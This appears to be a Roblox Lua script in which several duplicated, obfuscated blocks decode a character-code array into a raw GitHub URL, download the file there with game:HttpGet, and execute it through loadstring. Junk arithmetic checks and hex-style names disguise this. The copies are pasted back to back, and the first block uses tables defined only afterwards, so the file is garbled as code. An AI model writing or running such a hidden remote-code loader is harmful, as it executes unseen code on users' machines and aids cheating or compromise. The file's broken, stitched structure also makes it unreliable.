
local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
-- 2
local _0xa7c2 = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x4b8e = 9812.214
local _0x3d7a = 5419.018

local function _0x9e2f(a, b)
    local r = a * b
    return r + 3192
end

local function _0x2c1b(n)
    local t = {}
    for i = 1, 5 do
        table.insert(t, math.floor(n / i))
    end
    return t[3]
end

local function _0x5f8a(arr)
    local s = ""
    for i = 1, #arr do
        s = s .. string.char(arr[i])
    end
    return s
end

local function _0x7b4d()
    local x = _0x9e2f(2, 4)
    local y = _0x2c1b(_0x4b8e)
    
    if x == y then return end
    
    local u = _0x5f8a(_0xa7c2)
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Failed to initialize: 0x4B3F")
        end
    else
        warn("Failed to retrieve: 0x9C1A")
    end
end

_0x7b4d()
-- 1
local _0x9b1a = {
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 46, 99, 111, 109, 47, 121, 
    117, 110, 106, 117, 110, 51, 55, 51, 55, 45, 115, 104, 105, 112, 45, 105, 
    116, 47, 102, 116, 97, 45, 110, 112, 47, 109, 97, 105, 110, 47, 65, 73, 
    80, 65, 50, 46, 108, 117, 97, 45, 49, 45, 49, 46, 116, 120, 116
}

local _0x3e8c = {993, 2814, 4992, 1102, 8432, 5913, 2045, 3314, 7651}
local _0x2f4d = "dummy_obfuscator_vector"

local function _0x5b7a(a)
    local x = 0
    for i = 1, #_0x3e8c do
        x = x + _0x3e8c[i]
    end
    return x * a
end

local function _0x8d4e(s)
    local n = 0
    for i = 1, #s do
        n = n + string.byte(s, i)
    end
    return n
end

local function _0x1c9b()
    local r = ""
    for i = 1, #_0x9b1a do
        r = r .. string.char(_0x9b1a[i])
    end
    return r
end

local function _0x6a2f()
    local v1 = _0x5b7a(2)
    local v2 = _0x8d4e(_0x2f4d)
    
    if v1 < 0 or v2 < 0 then return end
    
    local u = _0x1c9b()
    local s, c = pcall(function()
        return game:HttpGet(u)
    end)
    
    if s and c then
        local f, e = loadstring(c)
        if f then
            f()
        else
            warn("Error Code: 0x98FF")
        end
    else
        warn("Error Code: 0x22AA")
    end
end

_0x6a2f()
